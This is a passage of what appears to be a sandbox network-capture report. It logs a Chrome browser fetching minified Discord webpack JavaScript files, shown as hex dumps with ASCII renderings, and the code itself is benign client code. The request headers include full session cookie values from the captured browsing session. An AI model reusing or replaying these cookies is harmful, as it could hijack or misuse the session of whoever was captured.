                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 6e 74 7b 73 68 6f 75 6c 64 41 75 74 6f 70 6c 61 79 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 61 6e 69 6d 61 74 65 64 26 26 65 2e 61 75 74 6f 70 6c 61 79 7d 63 6f 6d 70 6f 6e 65 6e 74 44 69 64 4d 6f 75 6e 74 28 29 7b 74 68 69 73 2e 73 68 6f 75 6c 64 41 75 74 6f 70 6c 61 79 28 74 68 69 73 2e 70 72 6f 70 73 29 26 26 69 28 74 68 69 73 29 7d 63 6f 6d 70 6f 6e 65 6e 74 44 69 64 55 70 64 61 74 65 28 65 29 7b 6c 65 74 20 74 3d 74 68 69 73 2e 73 68 6f 75 6c 64 41 75 74 6f 70 6c 61 79 28 65 29 2c 6e 3d 74 68 69 73 2e 73 68 6f 75 6c 64 41 75 74 6f 70 6c 61 79 28 74 68 69 73 2e 70 72 6f 70 73 29 3b 6e 21 3d 3d 74 26 26 28 6e 3f 69 28 74 68 69 73 29 3a 6f 28 74 68 69 73 29 29 7d 63 6f 6d 70 6f 6e 65 6e 74 57 69 6c 6c 55 6e 6d 6f 75 6e 74 28 29 7b 74 68 69 73 2e 73 68 6f
                                                                          Data Ascii: nt{shouldAutoplay(e){return e.animated&&e.autoplay}componentDidMount(){this.shouldAutoplay(this.props)&&i(this)}componentDidUpdate(e){let t=this.shouldAutoplay(e),n=this.shouldAutoplay(this.props);n!==t&&(n?i(this):o(this))}componentWillUnmount(){this.sho
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 61 28 68 2e 69 6e 66 6f 2c 64 29 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 72 2e 6a 73 78 29 28 6f 2e 54 6f 6f 6c 74 69 70 2c 7b 74 65 78 74 3a 66 2e 64 65 66 61 75 6c 74 2e 4d 65 73 73 61 67 65 73 2e 53 54 52 45 41 4d 45 52 5f 4d 4f 44 45 5f 45 4e 41 42 4c 45 44 2c 73 68 6f 75 6c 64 53 68 6f 77 3a 53 2c 63 68 69 6c 64 72 65 6e 3a 65 3d 3e 28 30 2c 72 2e 6a 73 78 29 28 22 73 70 61 6e 22 2c 7b 2e 2e 2e 65 2c 63 6c 61 73 73 4e 61 6d 65 3a 61 28 68 2e 75 73 65 72 6e 61 6d 65 2c 63 29 2c 73 74 79 6c 65 3a 6e 75 6c 6c 21 3d 6d 3f 7b 63 6f 6c 6f 72 3a 6d 7d 3a 76 6f 69 64 20 30 2c 63 68 69 6c 64 72 65 6e 3a 74 7d 29 7d 29 2c 6e 75 6c 6c 21 3d 6e 3f 28 30 2c 72 2e 6a 73 78 29 28 22 73 70 61 6e 22 2c 7b 63 6c 61 73 73 4e 61 6d
                                                                          Data Ascii: ,{className:a(h.info,d),children:[(0,r.jsx)(o.Tooltip,{text:f.default.Messages.STREAMER_MODE_ENABLED,shouldShow:S,children:e=>(0,r.jsx)("span",{...e,className:a(h.username,c),style:null!=m?{color:m}:void 0,children:t})}),null!=n?(0,r.jsx)("span",{classNam
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 66 61 75 6c 74 29 28 6c 29 2c 78 6d 6c 6e 73 3a 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 2c 77 69 64 74 68 3a 74 2c 68 65 69 67 68 74 3a 6e 2c 66 69 6c 6c 3a 22 6e 6f 6e 65 22 2c 76 69 65 77 42 6f 78 3a 22 30 20 30 20 32 34 20 32 34 22 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 72 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 66 69 6c 6c 3a 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 69 3f 69 3a 69 2e 63 73 73 2c 64 3a 22 4d 31 2e 33 20 32 31 2e 33 61 31 20 31 20 30 20 31 20 30 20 31 2e 34 20 31 2e 34 6c 32 30 2d 32 30 61 31 20 31 20 30 20 30 20 30 2d 31 2e 34 2d 31 2e 34 6c 2d 32 30 20 32 30 5a 4d 33 2e 31 36 20 31 36 2e 30 35 63 2e 31 38 2e 32 34 2e 35 33 2e 32 36 2e 37 34 2e 30 35 6c 2e 37 32 2d 2e 37 32 63
                                                                          Data Ascii: fault)(l),xmlns:"http://www.w3.org/2000/svg",width:t,height:n,fill:"none",viewBox:"0 0 24 24",children:[(0,r.jsx)("path",{fill:"string"==typeof i?i:i.css,d:"M1.3 21.3a1 1 0 1 0 1.4 1.4l20-20a1 1 0 0 0-1.4-1.4l-20 20ZM3.16 16.05c.18.24.53.26.74.05l.72-.72c
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 75 6c 74 2e 67 65 74 52 65 6d 6f 74 65 53 65 73 73 69 6f 6e 49 64 28 29 7c 7c 6e 75 6c 6c 21 3d 73 2e 64 65 66 61 75 6c 74 2e 67 65 74 41 77 61 69 74 69 6e 67 52 65 6d 6f 74 65 53 65 73 73 69 6f 6e 49 6e 66 6f 28 29 29 7d 7d 2c 33 30 30 33 32 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 56 6f 69 63 65 49 6e 54 68 72 65 61 64 73 45 78 70 65 72 69 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 53 7d 2c 75 73 65 43 61 6e 53 74 61 72 74 50 75 62 6c 69 63 54 68 72 65 61 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 45 7d 2c 63 6f 6d 70 75 74 65 43 61 6e 53 74 61 72 74 50 75 62 6c 69 63 54 68 72 65 61 64 3a 66 75 6e 63 74 69 6f 6e 28 29
                                                                          Data Ascii: ult.getRemoteSessionId()||null!=s.default.getAwaitingRemoteSessionInfo())}},300322:function(e,t,n){"use strict";n.r(t),n.d(t,{VoiceInThreadsExperiment:function(){return S},useCanStartPublicThread:function(){return E},computeCanStartPublicThread:function()
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 5f 50 55 42 4c 49 43 5f 54 48 52 45 41 44 53 2c 70 2e 50 65 72 6d 69 73 73 69 6f 6e 73 2e 52 45 41 44 5f 4d 45 53 53 41 47 45 5f 48 49 53 54 4f 52 59 29 3b 72 65 74 75 72 6e 20 68 2e 64 65 66 61 75 6c 74 2e 63 61 6e 28 74 2c 65 29 7d 2c 5b 65 5d 29 3b 72 65 74 75 72 6e 20 41 28 6e 2c 65 2c 74 29 7d 66 75 6e 63 74 69 6f 6e 20 76 28 65 2c 74 29 7b 6c 65 74 20 6e 3d 65 2e 69 73 46 6f 72 75 6d 4c 69 6b 65 43 68 61 6e 6e 65 6c 28 29 3f 70 2e 50 65 72 6d 69 73 73 69 6f 6e 73 2e 53 45 4e 44 5f 4d 45 53 53 41 47 45 53 3a 61 2e 64 65 66 61 75 6c 74 2e 63 6f 6d 62 69 6e 65 28 70 2e 50 65 72 6d 69 73 73 69 6f 6e 73 2e 43 52 45 41 54 45 5f 50 55 42 4c 49 43 5f 54 48 52 45 41 44 53 2c 70 2e 50 65 72 6d 69 73 73 69 6f 6e 73 2e 52 45 41 44 5f 4d 45 53 53 41 47 45 5f 48
                                                                          Data Ascii: _PUBLIC_THREADS,p.Permissions.READ_MESSAGE_HISTORY);return h.default.can(t,e)},[e]);return A(n,e,t)}function v(e,t){let n=e.isForumLikeChannel()?p.Permissions.SEND_MESSAGES:a.default.combine(p.Permissions.CREATE_PUBLIC_THREADS,p.Permissions.READ_MESSAGE_H


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          299192.168.2.550034162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:16 UTC866OUTGET /assets/77015.bb8daebc6abe745c8fdd.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=36UR1xj7QXALJHlPkKNYSZak_acowoTVIs8M.pfmOLE-1702226715939-0-604800000
                                                                          2023-12-10 16:45:16 UTC971INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 31 35 32 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 31 34 33 66 64 35 31 32 37 33 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63 6f
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:16 GMTContent-Type: application/javascriptContent-Length: 31522Connection: closeCF-Ray: 8336f5143fd51273-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.co
                                                                          2023-12-10 16:45:16 UTC398INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 37 37 30 31 35 22 5d 2c 7b 36 34 30 35 38 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 63 72 65 61 74 65 4c 61 79 6f 75 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 69 7d 2c 73 65 74 57 69 64 67 65 74 4c 61 79 6f 75 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 6f 7d 2c 73 65 74 54 6f 70 57 69 64 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 7d 2c 74 6f 67 67 6c 65 50 69 6e 6e 65 64 3a 66 75 6e 63 74 69
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["77015"],{640583:function(e,t,n){"use strict";n.r(t),n.d(t,{createLayout:function(){return i},setWidgetLayout:function(){return o},setTopWidget:function(){return r},togglePinned:functi
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 28 29 7b 72 65 74 75 72 6e 20 73 7d 7d 29 3b 76 61 72 20 61 3d 6e 28 22 39 31 33 31 34 34 22 29 2c 6c 3d 6e 28 22 38 31 39 30 36 38 22 29 3b 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 74 29 7b 6c 65 74 20 6e 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 32 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 32 5d 3a 6c 2e 4f 56 45 52 4c 41 59 5f 44 45 46 41 55 4c 54 5f 52 45 53 4f 4c 55 54 49 4f 4e 3b 61 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 4c 41 59 4f 55 54 5f 43 52 45 41 54 45 22 2c 6c 61 79 6f 75 74 49 64 3a 65 2c 77 69 64 67 65 74 73 3a 74 2c 64 65 66 61 75 6c 74 52 65 73 6f 6c 75 74 69 6f 6e 3a 6e 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 2c 74 2c 6e 29 7b
                                                                          Data Ascii: (){return s}});var a=n("913144"),l=n("819068");function i(e,t){let n=arguments.length>2&&void 0!==arguments[2]?arguments[2]:l.OVERLAY_DEFAULT_RESOLUTION;a.default.dispatch({type:"LAYOUT_CREATE",layoutId:e,widgets:t,defaultResolution:n})}function o(e,t,n){
                                                                          2023-12-10 16:45:16 UTC1243INData Raw: 22 4f 56 45 52 4c 41 59 5f 4d 4f 55 4e 54 45 44 22 2c 6e 75 64 67 65 3a 65 7d 29 7d 2c 73 65 74 46 6f 63 75 73 65 64 50 49 44 28 65 29 7b 6c 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 4f 56 45 52 4c 41 59 5f 46 4f 43 55 53 45 44 22 2c 70 69 64 3a 65 7d 29 7d 2c 73 65 74 49 6e 70 75 74 4c 6f 63 6b 65 64 28 65 2c 74 29 7b 6c 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 4f 56 45 52 4c 41 59 5f 53 45 54 5f 49 4e 50 55 54 5f 4c 4f 43 4b 45 44 22 2c 6c 6f 63 6b 65 64 3a 65 2c 70 69 64 3a 74 7d 29 7d 2c 73 65 74 55 49 4c 6f 63 6b 65 64 28 65 2c 74 29 7b 6c 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 4f 56 45 52 4c 41 59 5f 53 45 54 5f 55 49 5f 4c 4f 43 4b 45 44 22 2c 6c
                                                                          Data Ascii: "OVERLAY_MOUNTED",nudge:e})},setFocusedPID(e){l.default.dispatch({type:"OVERLAY_FOCUSED",pid:e})},setInputLocked(e,t){l.default.dispatch({type:"OVERLAY_SET_INPUT_LOCKED",locked:e,pid:t})},setUILocked(e,t){l.default.dispatch({type:"OVERLAY_SET_UI_LOCKED",l
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 4f 56 45 52 4c 41 59 5f 54 4f 47 47 4c 45 5f 53 48 4f 57 5f 4b 45 59 42 49 4e 44 53 22 2c 73 68 6f 75 6c 64 53 68 6f 77 3a 65 7d 29 7d 2c 63 61 6c 6c 50 72 69 76 61 74 65 43 68 61 6e 6e 65 6c 28 65 2c 74 29 7b 6c 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 4f 56 45 52 4c 41 59 5f 43 41 4c 4c 5f 50 52 49 56 41 54 45 5f 43 48 41 4e 4e 45 4c 22 2c 63 68 61 6e 6e 65 6c 49 64 3a 65 2c 72 69 6e 67 3a 74 7d 29 7d 2c 73 65 74 54 65 78 74 57 69 64 67 65 74 4f 70 61 63 69 74 79 28 65 29 7b 6c 2e 64 65 66 61 75 6c 74 2e 64 69 73 70 61 74 63 68 28 7b 74 79 70 65 3a 22 4f 56 45 52 4c 41 59 5f 53 45 54 5f 54 45 58 54 5f 57 49 44 47 45 54 5f 4f 50 41 43 49 54 59 22 2c
                                                                          Data Ascii: default.dispatch({type:"OVERLAY_TOGGLE_SHOW_KEYBINDS",shouldShow:e})},callPrivateChannel(e,t){l.default.dispatch({type:"OVERLAY_CALL_PRIVATE_CHANNEL",channelId:e,ring:t})},setTextWidgetOpacity(e){l.default.dispatch({type:"OVERLAY_SET_TEXT_WIDGET_OPACITY",
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 74 57 69 64 67 65 74 43 6f 6e 66 69 67 28 73 2e 4f 76 65 72 6c 61 79 57 69 64 67 65 74 73 2e 47 55 49 4c 44 53 29 2c 69 3d 6f 2e 64 65 66 61 75 6c 74 2e 67 65 74 57 69 64 67 65 74 43 6f 6e 66 69 67 28 73 2e 4f 76 65 72 6c 61 79 57 69 64 67 65 74 73 2e 54 45 58 54 29 2c 72 3d 6f 2e 64 65 66 61 75 6c 74 2e 67 65 74 57 69 64 67 65 74 43 6f 6e 66 69 67 28 73 2e 4f 76 65 72 6c 61 79 57 69 64 67 65 74 73 2e 47 55 49 4c 44 53 5f 54 45 58 54 29 3b 69 66 28 30 3d 3d 3d 6e 2e 6c 65 6e 67 74 68 7c 7c 6e 75 6c 6c 3d 3d 6c 7c 7c 6e 75 6c 6c 3d 3d 69 7c 7c 6e 75 6c 6c 3d 3d 72 29 72 65 74 75 72 6e 3b 6c 65 74 20 63 3d 64 2e 64 65 66 61 75 6c 74 2e 77 69 6e 64 6f 77 53 69 7a 65 28 29 2c 4f 3d 7b 77 69 64 74 68 3a 30 2c 68 65 69 67 68 74 3a 30 7d 2c 54 3d 7b 74 6f 70 3a
                                                                          Data Ascii: tWidgetConfig(s.OverlayWidgets.GUILDS),i=o.default.getWidgetConfig(s.OverlayWidgets.TEXT),r=o.default.getWidgetConfig(s.OverlayWidgets.GUILDS_TEXT);if(0===n.length||null==l||null==i||null==r)return;let c=d.default.windowSize(),O={width:0,height:0},T={top:
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 53 20 65 78 69 73 74 73 22 29 3b 28 30 2c 5f 2e 63 72 65 61 74 65 57 69 64 67 65 74 29 28 7b 2e 2e 2e 54 2c 74 79 70 65 3a 73 2e 4f 76 65 72 6c 61 79 57 69 64 67 65 74 73 2e 47 55 49 4c 44 53 2c 69 64 3a 28 30 2c 61 2e 76 34 29 28 29 2c 73 69 7a 65 3a 69 2c 61 6e 63 68 6f 72 3a 6e 2c 6c 61 79 6f 75 74 49 64 3a 74 7d 29 7d 65 6c 73 65 7b 6c 65 74 20 65 3d 22 61 75 74 6f 22 3d 3d 3d 4f 2e 77 69 64 74 68 3f 69 2e 6d 69 6e 53 69 7a 65 2e 77 69 64 74 68 3a 4f 2e 77 69 64 74 68 3b 65 2b 3d 6c 2e 6d 69 6e 53 69 7a 65 2e 77 69 64 74 68 3b 6c 65 74 5b 6e 2c 72 5d 3d 28 30 2c 45 2e 67 65 74 4c 65 66 74 57 69 64 67 65 74 53 70 65 63 73 29 28 54 2c 7b 68 65 69 67 68 74 3a 41 2e 68 65 69 67 68 74 2c 77 69 64 74 68 3a 65 7d 2c 63 29 2c 64 3d 6f 2e 64 65 66 61 75 6c 74
                                                                          Data Ascii: S exists");(0,_.createWidget)({...T,type:s.OverlayWidgets.GUILDS,id:(0,a.v4)(),size:i,anchor:n,layoutId:t})}else{let e="auto"===O.width?i.minSize.width:O.width;e+=l.minSize.width;let[n,r]=(0,E.getLeftWidgetSpecs)(T,{height:A.height,width:e},c),d=o.default
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 31 37 33 35 31 22 29 2c 75 3d 6e 2e 6e 28 45 29 2c 5f 3d 6e 28 22 34 34 36 36 37 34 22 29 2c 73 3d 6e 28 22 39 31 33 31 34 34 22 29 2c 63 3d 6e 28 22 34 38 35 33 32 38 22 29 2c 4f 3d 6e 28 22 36 30 35 32 35 30 22 29 2c 54 3d 6e 28 22 34 32 38 38 37 22 29 2c 41 3d 6e 28 22 35 39 39 31 31 30 22 29 2c 49 3d 6e 28 22 37 37 33 33 33 36 22 29 2c 53 3d 6e 28 22 35 30 38 38 35 22 29 2c 66 3d 6e 28 22 31 33 37 39 38 22 29 2c 4e 3d 6e 28 22 38 36 30 39 35 37 22 29 2c 4c 3d 6e 28 22 34 39 31 31 31 22 29 2c 43 3d 6e 28 22 38 30 30 32 38 22 29 2c 44 3d 6e 28 22 38 34 36 33 32 35 22 29 2c 79 3d 6e 28 22 33 39 30 34 39 33 22 29 3b 6c 65 74 20 70 3d 6e 65 77 20 4f 2e 64 65 66 61 75 6c 74 28 22 4b 65 79 62 69 6e 64 73 53 74 6f 72 65 22 29 2c 52 3d 7b 7d 2c 76 3d 7b 7d 2c
                                                                          Data Ascii: 17351"),u=n.n(E),_=n("446674"),s=n("913144"),c=n("485328"),O=n("605250"),T=n("42887"),A=n("599110"),I=n("773336"),S=n("50885"),f=n("13798"),N=n("860957"),L=n("49111"),C=n("80028"),D=n("846325"),y=n("390493");let p=new O.default("KeybindsStore"),R={},v={},
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 69 6e 64 28 28 30 2c 66 2e 74 6f 53 74 72 69 6e 67 29 28 65 2e 73 68 6f 72 74 63 75 74 29 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 6c 65 74 20 74 3d 7b 69 64 3a 68 2e 74 6f 53 74 72 69 6e 67 28 29 2c 65 6e 61 62 6c 65 64 3a 21 30 2c 61 63 74 69 6f 6e 3a 4c 2e 47 6c 6f 62 61 6c 4b 65 79 62 69 6e 64 41 63 74 69 6f 6e 73 2e 55 4e 41 53 53 49 47 4e 45 44 2c 73 68 6f 72 74 63 75 74 3a 5b 5d 2c 6d 61 6e 61 67 65 64 3a 21 31 2c 70 61 72 61 6d 73 3a 7b 7d 2c 2e 2e 2e 65 7d 3b 72 65 74 75 72 6e 20 76 3d 7b 2e 2e 2e 76 2c 5b 74 2e 69 64 5d 3a 74 7d 2c 68 2b 3d 31 2c 74 7d 66 75 6e 63 74 69 6f 6e 20 4d 28 65 29 7b 6d 28 65 2e 69 64 29 2c 76 3d 7b 2e 2e 2e 76 7d 2c 64 65 6c 65 74 65 20 76 5b 65 2e 69 64 5d 7d 66 75 6e 63 74 69 6f 6e 20 59 28 65 29 7b 6c 65 74
                                                                          Data Ascii: ind((0,f.toString)(e.shortcut))}function b(e){let t={id:h.toString(),enabled:!0,action:L.GlobalKeybindActions.UNASSIGNED,shortcut:[],managed:!1,params:{},...e};return v={...v,[t.id]:t},h+=1,t}function M(e){m(e.id),v={...v},delete v[e.id]}function Y(e){let
                                                                          2023-12-10 16:45:16 UTC1369INData Raw: 75 74 73 28 29 2c 28 65 2c 74 2c 6e 29 3d 3e 7b 6c 65 74 20 61 3d 75 2e 66 69 6e 64 28 76 2c 65 3d 3e 65 2e 61 63 74 69 6f 6e 3d 3d 3d 4c 2e 47 6c 6f 62 61 6c 4b 65 79 62 69 6e 64 41 63 74 69 6f 6e 73 2e 50 55 53 48 5f 54 4f 5f 54 41 4c 4b 26 26 21 30 3d 3d 3d 65 2e 6d 61 6e 61 67 65 64 26 26 65 2e 63 6f 6e 74 65 78 74 3d 3d 3d 6e 29 3b 69 66 28 6e 75 6c 6c 3d 3d 61 29 55 28 62 28 7b 61 63 74 69 6f 6e 3a 4c 2e 47 6c 6f 62 61 6c 4b 65 79 62 69 6e 64 41 63 74 69 6f 6e 73 2e 50 55 53 48 5f 54 4f 5f 54 41 4c 4b 2c 65 6e 61 62 6c 65 64 3a 21 30 2c 73 68 6f 72 74 63 75 74 3a 74 2c 6d 61 6e 61 67 65 64 3a 21 30 2c 70 61 72 61 6d 73 3a 7b 7d 2c 63 6f 6e 74 65 78 74 3a 6e 7d 29 29 3b 65 6c 73 65 7b 69 66 28 6e 75 6c 6c 3d 3d 74 29 72 65 74 75 72 6e 20 65 7c 7c 21
                                                                          Data Ascii: uts(),(e,t,n)=>{let a=u.find(v,e=>e.action===L.GlobalKeybindActions.PUSH_TO_TALK&&!0===e.managed&&e.context===n);if(null==a)U(b({action:L.GlobalKeybindActions.PUSH_TO_TALK,enabled:!0,shortcut:t,managed:!0,params:{},context:n}));else{if(null==t)return e||!


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          300192.168.2.550035162.159.137.2324435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:45:16 UTC866OUTGET /assets/97146.ba5d381e14f798be8b84.js HTTP/1.1
                                                                          Host: discord.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://discord.com/invite/boringsecurity
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: __dcfduid=79a14dd0977b11eea42d670f70a22cc1; __sdcfduid=79a14dd1977b11eea42d670f70a22cc1d54c5ff17e3ae6d1c8d813524e80fff90af806631d5e3c4a7bbe794afe9267c8; __cfruid=88265d2eabed649c144acdb2d7cc9060a4b7d732-1702226707; _cfuvid=36UR1xj7QXALJHlPkKNYSZak_acowoTVIs8M.pfmOLE-1702226715939-0-604800000
                                                                          2023-12-10 16:45:16 UTC974INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 35 3a 31 36 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 38 39 39 34 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 46 2d 52 61 79 3a 20 38 33 33 36 66 35 31 34 35 65 61 62 64 62 31 31 2d 4d 49 41 0d 0a 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 48 49 54 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 64 69 73 63 6f 72 64 2e 63
                                                                          Data Ascii: HTTP/1.1 200 OKDate: Sun, 10 Dec 2023 16:45:16 GMTContent-Type: application/javascriptContent-Length: 189943Connection: closeCF-Ray: 8336f5145eabdb11-MIACF-Cache-Status: HITAccept-Ranges: bytesAccess-Control-Allow-Origin: https://discord.c
                                                                          2023-12-10 16:45:16 UTC395INData Raw: 28 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 3d 74 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 64 69 73 63 6f 72 64 5f 61 70 70 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 39 37 31 34 36 22 5d 2c 7b 34 34 30 35 34 30 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 74 2c 78 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 69 2e 65 78 70 6f 72 74 73 3d 7b 76 3a 22 34 2e 38 2e 30 22 2c 6d 65 74 61 3a 7b 67 3a 22 4c 6f 74 74 69 65 46 69 6c 65 73 20 41 45 20 33 2e 30 2e 32 22 2c 61 3a 22 22 2c 6b 3a 22 22 2c 64 3a 22 22 2c 74 63 3a 22 22 7d 2c 66 72 3a 36 30 2c 69 70 3a 32 2c 6f 70 3a 38 31 2c 77 3a 31 32 38 30 2c 68 3a 37 32 30 2c 6e 6d 3a 22 46 72 61 6d 65 45 66 66 65 63 74 5f 31 30 2d 31 5f 4f 75 74 22 2c 64 64 64 3a 30 2c 61 73
                                                                          Data Ascii: (this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["97146"],{440540:function(i,t,x){"use strict";i.exports={v:"4.8.0",meta:{g:"LottieFiles AE 3.0.2",a:"",k:"",d:"",tc:""},fr:60,ip:2,op:81,w:1280,h:720,nm:"FrameEffect_10-1_Out",ddd:0,as
